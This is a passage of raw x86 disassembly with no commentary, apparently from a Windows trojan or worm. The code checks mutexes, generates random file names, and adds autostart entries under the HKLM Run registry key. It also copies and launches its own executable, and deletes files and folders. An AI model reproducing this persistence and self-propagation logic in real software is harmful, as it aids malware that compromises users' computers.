0040F626 |. 8B00 mov eax, dword ptr ds:[eax]
0040F628 |. E8 D36DFFFF call 00406400
0040F62D |. 8B45 AC mov eax, dword ptr ss:[ebp-54]
0040F630 |. 50 push eax
0040F631 |. 8D45 A0 lea eax, dword ptr ss:[ebp-60]
0040F634 |. E8 E783FFFF call 00407A20
0040F639 |. FF75 A0 push dword ptr ss:[ebp-60]
0040F63C |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F641 |. FF30 push dword ptr ds:[eax]
0040F643 |. FF37 push dword ptr ds:[edi]
0040F645 |. 8D45 A4 lea eax, dword ptr ss:[ebp-5C]
0040F648 |. BA 03000000 mov edx, 3
0040F64D |. E8 0647FFFF call 00403D58
0040F652 |. 8B45 A4 mov eax, dword ptr ss:[ebp-5C]
0040F655 |. 8D55 A8 lea edx, dword ptr ss:[ebp-58]
0040F658 |. E8 A36DFFFF call 00406400
0040F65D |. 8B55 A8 mov edx, dword ptr ss:[ebp-58]
0040F660 |. 58 pop eax
0040F661 |. E8 7E47FFFF call 00403DE4
0040F666 |. 0F84 C4060000 je 0040FD30
0040F66C |. 8D55 9C lea edx, dword ptr ss:[ebp-64]
0040F66F |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F674 |. 8B00 mov eax, dword ptr ds:[eax]
0040F676 |. E8 856DFFFF call 00406400
0040F67B |. 8B45 9C mov eax, dword ptr ss:[ebp-64]
0040F67E |. 50 push eax
0040F67F |. 8D45 90 lea eax, dword ptr ss:[ebp-70]
0040F682 |. E8 4984FFFF call 00407AD0
0040F687 |. FF75 90 push dword ptr ss:[ebp-70]
0040F68A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F68F |. FF30 push dword ptr ds:[eax]
0040F691 |. FF37 push dword ptr ds:[edi]
0040F693 |. 8D45 94 lea eax, dword ptr ss:[ebp-6C]
0040F696 |. BA 03000000 mov edx, 3
0040F69B |. E8 B846FFFF call 00403D58
0040F6A0 |. 8B45 94 mov eax, dword ptr ss:[ebp-6C]
0040F6A3 |. 8D55 98 lea edx, dword ptr ss:[ebp-68]
0040F6A6 |. E8 556DFFFF call 00406400
0040F6AB |. 8B55 98 mov edx, dword ptr ss:[ebp-68]
0040F6AE |. 58 pop eax
0040F6AF |. E8 3047FFFF call 00403DE4
0040F6B4 |. 0F84 76060000 je 0040FD30
0040F6BA |. 8D55 8C lea edx, dword ptr ss:[ebp-74]
0040F6BD |. A1 60144100 mov eax, dword ptr ds:[411460]
0040F6C2 |. 8B00 mov eax, dword ptr ds:[eax]
0040F6C4 |. E8 D36FFFFF call 0040669C
0040F6C9 |. 8D45 8C lea eax, dword ptr ss:[ebp-74]
0040F6CC |. 50 push eax
0040F6CD |. 8D45 84 lea eax, dword ptr ss:[ebp-7C]
0040F6D0 |. E8 F369FFFF call 004060C8
0040F6D5 |. 8B45 84 mov eax, dword ptr ss:[ebp-7C]
0040F6D8 |. 8D55 88 lea edx, dword ptr ss:[ebp-78]
0040F6DB |. E8 AC84FFFF call 00407B8C
0040F6E0 |. 8B55 88 mov edx, dword ptr ss:[ebp-78]
0040F6E3 |. 58 pop eax
0040F6E4 |. E8 B745FFFF call 00403CA0
0040F6E9 |. 8B45 8C mov eax, dword ptr ss:[ebp-74]
0040F6EC |. E8 A747FFFF call 00403E98
0040F6F1 |. 50 push eax ; /MutexName
0040F6F2 |. 6A 00 push 0 ; |Inheritable = FALSE
0040F6F4 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F6F9 |. E8 6650FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F6FE |. 85C0 test eax, eax
0040F700 |. 0F85 EA0B0000 jnz 004102F0
0040F706 |. 8D85 7CFFFFFF lea eax, dword ptr ss:[ebp-84]
0040F70C |. E8 B769FFFF call 004060C8
0040F711 |. 8B85 7CFFFFFF mov eax, dword ptr ss:[ebp-84]
0040F717 |. 8D55 80 lea edx, dword ptr ss:[ebp-80]
0040F71A |. E8 6D84FFFF call 00407B8C
0040F71F |. 8D45 80 lea eax, dword ptr ss:[ebp-80]
0040F722 |. 50 push eax
0040F723 |. 8D95 78FFFFFF lea edx, dword ptr ss:[ebp-88]
0040F729 |. A1 64144100 mov eax, dword ptr ds:[411464]
0040F72E |. 8B00 mov eax, dword ptr ds:[eax]
0040F730 |. E8 676FFFFF call 0040669C
0040F735 |. 8B95 78FFFFFF mov edx, dword ptr ss:[ebp-88]
0040F73B |. 58 pop eax
0040F73C |. E8 5F45FFFF call 00403CA0
0040F741 |. 8B45 80 mov eax, dword ptr ss:[ebp-80]
0040F744 |. E8 4F47FFFF call 00403E98
0040F749 |. 50 push eax ; /MutexName
0040F74A |. 6A 00 push 0 ; |Inheritable = FALSE
0040F74C |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040F751 |. E8 0E50FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040F756 |. 85C0 test eax, eax
0040F758 |. 0F85 920B0000 jnz 004102F0
0040F75E |. E8 0530FFFF call 00402768
0040F763 |. B8 19000000 mov eax, 19
0040F768 |. E8 9F35FFFF call 00402D0C
0040F76D |. 8BD0 mov edx, eax
0040F76F |. 83C2 61 add edx, 61
0040F772 |. 8D85 74FFFFFF lea eax, dword ptr ss:[ebp-8C]
0040F778 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F77B |. C600 01 mov byte ptr ds:[eax], 1
0040F77E |. 8D95 74FFFFFF lea edx, dword ptr ss:[ebp-8C]
0040F784 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F78A |. E8 CD34FFFF call 00402C5C
0040F78F |. B8 19000000 mov eax, 19
0040F794 |. E8 7335FFFF call 00402D0C
0040F799 |. 8BD0 mov edx, eax
0040F79B |. 83C2 61 add edx, 61
0040F79E |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7A4 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7A7 |. C600 01 mov byte ptr ds:[eax], 1
0040F7AA |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7B0 |. 8D85 70FFFFFF lea eax, dword ptr ss:[ebp-90]
0040F7B6 |. B1 02 mov cl, 2
0040F7B8 |. E8 6F34FFFF call 00402C2C
0040F7BD |. 8D95 70FFFFFF lea edx, dword ptr ss:[ebp-90]
0040F7C3 |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7C9 |. E8 8E34FFFF call 00402C5C
0040F7CE |. B8 19000000 mov eax, 19
0040F7D3 |. E8 3435FFFF call 00402D0C
0040F7D8 |. 8BD0 mov edx, eax
0040F7DA |. 83C2 61 add edx, 61
0040F7DD |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F7E3 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F7E6 |. C600 01 mov byte ptr ds:[eax], 1
0040F7E9 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F7EF |. 8D85 68FFFFFF lea eax, dword ptr ss:[ebp-98]
0040F7F5 |. B1 03 mov cl, 3
0040F7F7 |. E8 3034FFFF call 00402C2C
0040F7FC |. 8D95 68FFFFFF lea edx, dword ptr ss:[ebp-98]
0040F802 |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F808 |. E8 4F34FFFF call 00402C5C
0040F80D |. B8 19000000 mov eax, 19
0040F812 |. E8 F534FFFF call 00402D0C
0040F817 |. 8BD0 mov edx, eax
0040F819 |. 83C2 61 add edx, 61
0040F81C |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F822 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F825 |. C600 01 mov byte ptr ds:[eax], 1
0040F828 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F82E |. 8D85 60FFFFFF lea eax, dword ptr ss:[ebp-A0]
0040F834 |. B1 04 mov cl, 4
0040F836 |. E8 F133FFFF call 00402C2C
0040F83B |. 8D95 60FFFFFF lea edx, dword ptr ss:[ebp-A0]
0040F841 |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F847 |. E8 1034FFFF call 00402C5C
0040F84C |. B8 19000000 mov eax, 19
0040F851 |. E8 B634FFFF call 00402D0C
0040F856 |. 8BD0 mov edx, eax
0040F858 |. 83C2 61 add edx, 61
0040F85B |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F861 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F864 |. C600 01 mov byte ptr ds:[eax], 1
0040F867 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F86D |. 8D85 58FFFFFF lea eax, dword ptr ss:[ebp-A8]
0040F873 |. B1 05 mov cl, 5
0040F875 |. E8 B233FFFF call 00402C2C
0040F87A |. 8D95 58FFFFFF lea edx, dword ptr ss:[ebp-A8]
0040F880 |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F886 |. E8 D133FFFF call 00402C5C
0040F88B |. B8 19000000 mov eax, 19
0040F890 |. E8 7734FFFF call 00402D0C
0040F895 |. 8BD0 mov edx, eax
0040F897 |. 83C2 61 add edx, 61
0040F89A |. 8D85 6CFFFFFF lea eax, dword ptr ss:[ebp-94]
0040F8A0 |. 8850 01 mov byte ptr ds:[eax+1], dl
0040F8A3 |. C600 01 mov byte ptr ds:[eax], 1
0040F8A6 |. 8D95 6CFFFFFF lea edx, dword ptr ss:[ebp-94]
0040F8AC |. 8D85 50FFFFFF lea eax, dword ptr ss:[ebp-B0]
0040F8B2 |. B1 06 mov cl, 6
0040F8B4 |. E8 7333FFFF call 00402C2C
0040F8B9 |. 8D95 50FFFFFF lea edx, dword ptr ss:[ebp-B0]
0040F8BF |. B8 0C314100 mov eax, 0041310C
0040F8C4 |. E8 AB43FFFF call 00403C74
0040F8C9 |. 68 80000000 push 80
0040F8CE |. 8D85 48FFFFFF lea eax, dword ptr ss:[ebp-B8]
0040F8D4 |. E8 4781FFFF call 00407A20
0040F8D9 |. FFB5 48FFFFFF push dword ptr ss:[ebp-B8]
0040F8DF |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F8E4 |. FF30 push dword ptr ds:[eax]
0040F8E6 |. FF37 push dword ptr ds:[edi]
0040F8E8 |. 8D85 4CFFFFFF lea eax, dword ptr ss:[ebp-B4]
0040F8EE |. BA 03000000 mov edx, 3
0040F8F3 |. E8 6044FFFF call 00403D58
0040F8F8 |. 8B85 4CFFFFFF mov eax, dword ptr ss:[ebp-B4]
0040F8FE |. E8 9545FFFF call 00403E98
0040F903 |. 50 push eax ; |FileName
0040F904 |. E8 834EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F909 |. 68 80000000 push 80
0040F90E |. 8D85 40FFFFFF lea eax, dword ptr ss:[ebp-C0]
0040F914 |. E8 B781FFFF call 00407AD0
0040F919 |. FFB5 40FFFFFF push dword ptr ss:[ebp-C0]
0040F91F |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F924 |. FF30 push dword ptr ds:[eax]
0040F926 |. FF37 push dword ptr ds:[edi]
0040F928 |. 8D85 44FFFFFF lea eax, dword ptr ss:[ebp-BC]
0040F92E |. BA 03000000 mov edx, 3
0040F933 |. E8 2044FFFF call 00403D58
0040F938 |. 8B85 44FFFFFF mov eax, dword ptr ss:[ebp-BC]
0040F93E |. E8 5545FFFF call 00403E98
0040F943 |. 50 push eax ; |FileName
0040F944 |. E8 434EFFFF call <jmp.&kernel32.SetFileAttributes>; \SetFileAttributesA
0040F949 |. 8D85 38FFFFFF lea eax, dword ptr ss:[ebp-C8]
0040F94F |. E8 CC80FFFF call 00407A20
0040F954 |. FFB5 38FFFFFF push dword ptr ss:[ebp-C8]
0040F95A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F95F |. FF30 push dword ptr ds:[eax]
0040F961 |. FF37 push dword ptr ds:[edi]
0040F963 |. 8D85 3CFFFFFF lea eax, dword ptr ss:[ebp-C4]
0040F969 |. BA 03000000 mov edx, 3
0040F96E |. E8 E543FFFF call 00403D58
0040F973 |. 8B85 3CFFFFFF mov eax, dword ptr ss:[ebp-C4]
0040F979 |. E8 1A45FFFF call 00403E98
0040F97E |. 50 push eax ; /FileName
0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F984 |. 8D85 30FFFFFF lea eax, dword ptr ss:[ebp-D0]
0040F98A |. E8 4181FFFF call 00407AD0
0040F98F |. FFB5 30FFFFFF push dword ptr ss:[ebp-D0]
0040F995 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040F99A |. FF30 push dword ptr ds:[eax]
0040F99C |. FF37 push dword ptr ds:[edi]
0040F99E |. 8D85 34FFFFFF lea eax, dword ptr ss:[ebp-CC]
0040F9A4 |. BA 03000000 mov edx, 3
0040F9A9 |. E8 AA43FFFF call 00403D58
0040F9AE |. 8B85 34FFFFFF mov eax, dword ptr ss:[ebp-CC]
0040F9B4 |. E8 DF44FFFF call 00403E98
0040F9B9 |. 50 push eax ; /FileName
0040F9BA |. E8 054DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9BF |. 8D85 28FFFFFF lea eax, dword ptr ss:[ebp-D8]
0040F9C5 |. E8 5680FFFF call 00407A20
0040F9CA |. FFB5 28FFFFFF push dword ptr ss:[ebp-D8]
0040F9D0 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040F9D5 |. FF30 push dword ptr ds:[eax]
0040F9D7 |. FF37 push dword ptr ds:[edi]
0040F9D9 |. 8D85 2CFFFFFF lea eax, dword ptr ss:[ebp-D4]
0040F9DF |. BA 03000000 mov edx, 3
0040F9E4 |. E8 6F43FFFF call 00403D58
0040F9E9 |. 8B85 2CFFFFFF mov eax, dword ptr ss:[ebp-D4]
0040F9EF |. E8 A444FFFF call 00403E98
0040F9F4 |. 50 push eax ; /Path
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040F9FA |. 8D85 20FFFFFF lea eax, dword ptr ss:[ebp-E0]
0040FA00 |. E8 CB80FFFF call 00407AD0
0040FA05 |. FFB5 20FFFFFF push dword ptr ss:[ebp-E0]
0040FA0B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FA10 |. FF30 push dword ptr ds:[eax]
0040FA12 |. FF37 push dword ptr ds:[edi]
0040FA14 |. 8D85 24FFFFFF lea eax, dword ptr ss:[ebp-DC]
0040FA1A |. BA 03000000 mov edx, 3
0040FA1F |. E8 3443FFFF call 00403D58
0040FA24 |. 8B85 24FFFFFF mov eax, dword ptr ss:[ebp-DC]
0040FA2A |. E8 6944FFFF call 00403E98
0040FA2F |. 50 push eax ; /Path
0040FA30 |. E8 474DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FA35 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA3B |. E8 E07FFFFF call 00407A20
0040FA40 |. 8D85 18FFFFFF lea eax, dword ptr ss:[ebp-E8]
0040FA46 |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FA4C |. E8 4F42FFFF call 00403CA0
0040FA51 |. 8B85 18FFFFFF mov eax, dword ptr ss:[ebp-E8]
0040FA57 |. E8 3C44FFFF call 00403E98
0040FA5C |. 8BD0 mov edx, eax
0040FA5E |. 8D85 1CFFFFFF lea eax, dword ptr ss:[ebp-E4]
0040FA64 |. E8 DB41FFFF call 00403C44
0040FA69 |. 8B85 1CFFFFFF mov eax, dword ptr ss:[ebp-E4]
0040FA6F |. 50 push eax
0040FA70 |. 8D85 0CFFFFFF lea eax, dword ptr ss:[ebp-F4]
0040FA76 |. E8 A57FFFFF call 00407A20
0040FA7B |. FFB5 0CFFFFFF push dword ptr ss:[ebp-F4]
0040FA81 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FA86 |. FF30 push dword ptr ds:[eax]
0040FA88 |. FF37 push dword ptr ds:[edi]
0040FA8A |. 8D85 10FFFFFF lea eax, dword ptr ss:[ebp-F0]
0040FA90 |. BA 03000000 mov edx, 3
0040FA95 |. E8 BE42FFFF call 00403D58
0040FA9A |. 8B85 10FFFFFF mov eax, dword ptr ss:[ebp-F0]
0040FAA0 |. E8 F343FFFF call 00403E98
0040FAA5 |. 8BD0 mov edx, eax
0040FAA7 |. 8D85 14FFFFFF lea eax, dword ptr ss:[ebp-EC]
0040FAAD |. E8 9241FFFF call 00403C44
0040FAB2 |. 8B85 14FFFFFF mov eax, dword ptr ss:[ebp-EC]
0040FAB8 |. 5A pop edx
0040FAB9 |. E8 A666FFFF call 00406164
0040FABE |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FAC4 |. E8 0780FFFF call 00407AD0
0040FAC9 |. 8D85 04FFFFFF lea eax, dword ptr ss:[ebp-FC]
0040FACF |. 8B15 0C314100 mov edx, dword ptr ds:[41310C]
0040FAD5 |. E8 C641FFFF call 00403CA0
0040FADA |. 8B85 04FFFFFF mov eax, dword ptr ss:[ebp-FC]
0040FAE0 |. E8 B343FFFF call 00403E98
0040FAE5 |. 8BD0 mov edx, eax
0040FAE7 |. 8D85 08FFFFFF lea eax, dword ptr ss:[ebp-F8]
0040FAED |. E8 5241FFFF call 00403C44
0040FAF2 |. 8B85 08FFFFFF mov eax, dword ptr ss:[ebp-F8]
0040FAF8 |. 50 push eax
0040FAF9 |. 8D85 F8FEFFFF lea eax, dword ptr ss:[ebp-108]
0040FAFF |. E8 CC7FFFFF call 00407AD0
0040FB04 |. FFB5 F8FEFFFF push dword ptr ss:[ebp-108]
0040FB0A |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FB0F |. FF30 push dword ptr ds:[eax]
0040FB11 |. FF37 push dword ptr ds:[edi]
0040FB13 |. 8D85 FCFEFFFF lea eax, dword ptr ss:[ebp-104]
0040FB19 |. BA 03000000 mov edx, 3
0040FB1E |. E8 3542FFFF call 00403D58
0040FB23 |. 8B85 FCFEFFFF mov eax, dword ptr ss:[ebp-104]
0040FB29 |. E8 6A43FFFF call 00403E98
0040FB2E |. 8BD0 mov edx, eax
0040FB30 |. 8D85 00FFFFFF lea eax, dword ptr ss:[ebp-100]
0040FB36 |. E8 0941FFFF call 00403C44
0040FB3B |. 8B85 00FFFFFF mov eax, dword ptr ss:[ebp-100]
0040FB41 |. 5A pop edx
0040FB42 |. E8 1D66FFFF call 00406164
0040FB47 |. A1 B0144100 mov eax, dword ptr ds:[4114B0]
0040FB4C |. 8B00 mov eax, dword ptr ds:[eax]
0040FB4E |. E8 4543FFFF call 00403E98
0040FB53 |. 8BD0 mov edx, eax
0040FB55 |. 8D85 F4FEFFFF lea eax, dword ptr ss:[ebp-10C]
0040FB5B |. E8 E440FFFF call 00403C44
0040FB60 |. 8B8D F4FEFFFF mov ecx, dword ptr ss:[ebp-10C]
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FB70 |. E8 CF6FFFFF call 00406B44
0040FB75 |. A1 50154100 mov eax, dword ptr ds:[411550]
0040FB7A |. 8B00 mov eax, dword ptr ds:[eax]
0040FB7C |. E8 1743FFFF call 00403E98
0040FB81 |. 8BD0 mov edx, eax
0040FB83 |. 8D85 F0FEFFFF lea eax, dword ptr ss:[ebp-110]
0040FB89 |. E8 B640FFFF call 00403C44
0040FB8E |. 8B8D F0FEFFFF mov ecx, dword ptr ss:[ebp-110]
0040FB94 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB99 |. B8 02000080 mov eax, 80000002
0040FB9E |. E8 A16FFFFF call 00406B44
0040FBA3 |. 6A FF push -1
0040FBA5 |. 8D85 E8FEFFFF lea eax, dword ptr ss:[ebp-118]
0040FBAB |. E8 707EFFFF call 00407A20
0040FBB0 |. FFB5 E8FEFFFF push dword ptr ss:[ebp-118]
0040FBB6 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FBBB |. FF30 push dword ptr ds:[eax]
0040FBBD |. FF37 push dword ptr ds:[edi]
0040FBBF |. 8D85 ECFEFFFF lea eax, dword ptr ss:[ebp-114]
0040FBC5 |. BA 03000000 mov edx, 3
0040FBCA |. E8 8941FFFF call 00403D58
0040FBCF |. 8B85 ECFEFFFF mov eax, dword ptr ss:[ebp-114]
0040FBD5 |. E8 BE42FFFF call 00403E98
0040FBDA |. 50 push eax
0040FBDB |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FBE0 |. 8B00 mov eax, dword ptr ds:[eax]
0040FBE2 |. E8 B142FFFF call 00403E98
0040FBE7 |. 50 push eax ; |ExistingFileName
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FBED |. 6A FF push -1
0040FBEF |. 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120]
0040FBF5 |. E8 D67EFFFF call 00407AD0
0040FBFA |. FFB5 E0FEFFFF push dword ptr ss:[ebp-120]
0040FC00 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC05 |. FF30 push dword ptr ds:[eax]
0040FC07 |. FF37 push dword ptr ds:[edi]
0040FC09 |. 8D85 E4FEFFFF lea eax, dword ptr ss:[ebp-11C]
0040FC0F |. BA 03000000 mov edx, 3
0040FC14 |. E8 3F41FFFF call 00403D58
0040FC19 |. 8B85 E4FEFFFF mov eax, dword ptr ss:[ebp-11C]
0040FC1F |. E8 7442FFFF call 00403E98
0040FC24 |. 50 push eax
0040FC25 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FC2A |. 8B00 mov eax, dword ptr ds:[eax]
0040FC2C |. E8 6742FFFF call 00403E98
0040FC31 |. 50 push eax ; |ExistingFileName
0040FC32 |. E8 4D4AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC37 |. 6A 01 push 1
0040FC39 |. 8D85 D8FEFFFF lea eax, dword ptr ss:[ebp-128]
0040FC3F |. E8 DC7DFFFF call 00407A20
0040FC44 |. FFB5 D8FEFFFF push dword ptr ss:[ebp-128]
0040FC4A |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FC4F |. FF30 push dword ptr ds:[eax]
0040FC51 |. FF37 push dword ptr ds:[edi]
0040FC53 |. 8D85 DCFEFFFF lea eax, dword ptr ss:[ebp-124]
0040FC59 |. BA 03000000 mov edx, 3
0040FC5E |. E8 F540FFFF call 00403D58
0040FC63 |. 8B85 DCFEFFFF mov eax, dword ptr ss:[ebp-124]
0040FC69 |. E8 2A42FFFF call 00403E98
0040FC6E |. 50 push eax ; |CmdLine
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FC74 |. 6A 01 push 1
0040FC76 |. 8D85 D0FEFFFF lea eax, dword ptr ss:[ebp-130]
0040FC7C |. E8 4F7EFFFF call 00407AD0
0040FC81 |. FFB5 D0FEFFFF push dword ptr ss:[ebp-130]
0040FC87 |. A1 3C154100 mov eax, dword ptr ds:[41153C]
0040FC8C |. FF30 push dword ptr ds:[eax]
0040FC8E |. FF37 push dword ptr ds:[edi]
0040FC90 |. 8D85 D4FEFFFF lea eax, dword ptr ss:[ebp-12C]
0040FC96 |. BA 03000000 mov edx, 3
0040FC9B |. E8 B840FFFF call 00403D58
0040FCA0 |. 8B85 D4FEFFFF mov eax, dword ptr ss:[ebp-12C]
0040FCA6 |. E8 ED41FFFF call 00403E98
0040FCAB |. 50 push eax ; |CmdLine
0040FCAC |. E8 F34AFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FCB1 |. BE 17000000 mov esi, 17
0040FCB6 |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040FCBC |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040FCC1 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040FCC3 |. E8 A03EFFFF |call 00403B68
0040FCC8 |. 8D95 CCFEFFFF |lea edx, dword ptr ss:[ebp-134]
0040FCCE |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040FCD3 |. 8B00 |mov eax, dword ptr ds:[eax]
0040FCD5 |. E8 2667FFFF |call 00406400
0040FCDA |. 8B85 CCFEFFFF |mov eax, dword ptr ss:[ebp-134]
0040FCE0 |. 50 |push eax
0040FCE1 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040FCE6 |. FF30 |push dword ptr ds:[eax]
0040FCE8 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040FCED |. FF30 |push dword ptr ds:[eax]
0040FCEF |. FF37 |push dword ptr ds:[edi]
0040FCF1 |. 8D85 C4FEFFFF |lea eax, dword ptr ss:[ebp-13C]
0040FCF7 |. BA 03000000 |mov edx, 3
0040FCFC |. E8 5740FFFF |call 00403D58
0040FD01 |. 8B85 C4FEFFFF |mov eax, dword ptr ss:[ebp-13C]
0040FD07 |. 8D95 C8FEFFFF |lea edx, dword ptr ss:[ebp-138]
0040FD0D |. E8 EE66FFFF |call 00406400
0040FD12 |. 8B95 C8FEFFFF |mov edx, dword ptr ss:[ebp-138]
0040FD18 |. 58 |pop eax
0040FD19 |. E8 C640FFFF |call 00403DE4
0040FD1E |. 74 05 |je short 0040FD25
0040FD20 |. E8 A761FFFF |call 00405ECC
0040FD25 |> 83C3 04 |add ebx, 4
0040FD28 |. 4E |dec esi
0040FD29 |.^ 75 91 \jnz short 0040FCBC
0040FD2B |. E9 C0050000 jmp 004102F0
0040FD30 |> A1 34154100 mov eax, dword ptr ds:[411534]
0040FD35 |. BA 04010000 mov edx, 104
0040FD3A |. E8 8142FFFF call 00403FC0
0040FD3F |. 68 04010000 push 104
0040FD44 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD49 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD4B |. E8 4841FFFF call 00403E98
0040FD50 |. 50 push eax ; |PathBuffer
0040FD51 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FD56 |. 50 push eax ; |hModule => NULL
0040FD57 |. E8 C049FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FD5C |. 8BD0 mov edx, eax
0040FD5E |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD63 |. E8 5842FFFF call 00403FC0
0040FD68 |. E8 DB85FFFF call 00408348
0040FD6D |. 8D95 C0FEFFFF lea edx, dword ptr ss:[ebp-140]
0040FD73 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD78 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD7A |. E8 8166FFFF call 00406400
0040FD7F |. 8B85 C0FEFFFF mov eax, dword ptr ss:[ebp-140]
0040FD85 |. 50 push eax
0040FD86 |. 8D85 B4FEFFFF lea eax, dword ptr ss:[ebp-14C]
0040FD8C |. E8 8F7CFFFF call 00407A20
0040FD91 |. FFB5 B4FEFFFF push dword ptr ss:[ebp-14C]
0040FD97 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FD9C |. FF30 push dword ptr ds:[eax]
0040FD9E |. FF37 push dword ptr ds:[edi]
0040FDA0 |. 8D85 B8FEFFFF lea eax, dword ptr ss:[ebp-148]
0040FDA6 |. BA 03000000 mov edx, 3
0040FDAB |. E8 A83FFFFF call 00403D58
0040FDB0 |. 8B85 B8FEFFFF mov eax, dword ptr ss:[ebp-148]
0040FDB6 |. 8D95 BCFEFFFF lea edx, dword ptr ss:[ebp-144]
0040FDBC |. E8 3F66FFFF call 00406400
0040FDC1 |. 8B95 BCFEFFFF mov edx, dword ptr ss:[ebp-144]
0040FDC7 |. 58 pop eax
0040FDC8 |. E8 1740FFFF call 00403DE4
0040FDCD |. 0F85 7E020000 jnz 00410051
0040FDD3 |. 6A 00 push 0 ; /Title = NULL
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FDDA |. E8 E549FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
0040FDDF |. 85C0 test eax, eax
0040FDE1 |. 0F84 09050000 je 004102F0
0040FDE7 |. 8D95 B0FEFFFF lea edx, dword ptr ss:[ebp-150]
0040FDED |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FDF2 |. 8B00 mov eax, dword ptr ds:[eax]
0040FDF4 |. E8 A368FFFF call 0040669C
0040FDF9 |. 8D85 B0FEFFFF lea eax, dword ptr ss:[ebp-150]
0040FDFF |. 50 push eax
0040FE00 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
0040FE06 |. E8 BD62FFFF call 004060C8
0040FE0B |. 8B85 A8FEFFFF mov eax, dword ptr ss:[ebp-158]
0040FE11 |. 8D95 ACFEFFFF lea edx, dword ptr ss:[ebp-154]
0040FE17 |. E8 707DFFFF call 00407B8C
0040FE1C |. 8B95 ACFEFFFF mov edx, dword ptr ss:[ebp-154]
0040FE22 |. 58 pop eax
0040FE23 |. E8 783EFFFF call 00403CA0
0040FE28 |. 8B85 B0FEFFFF mov eax, dword ptr ss:[ebp-150]
0040FE2E |. E8 6540FFFF call 00403E98
0040FE33 |. 50 push eax ; /MutexName
0040FE34 |. 6A 00 push 0 ; |Inheritable = FALSE
0040FE36 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FE40 |. 85C0 test eax, eax
0040FE42 |. 0F85 A8040000 jnz 004102F0
0040FE48 |. 8D95 A4FEFFFF lea edx, dword ptr ss:[ebp-15C]
0040FE4E |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FE53 |. 8B00 mov eax, dword ptr ds:[eax]
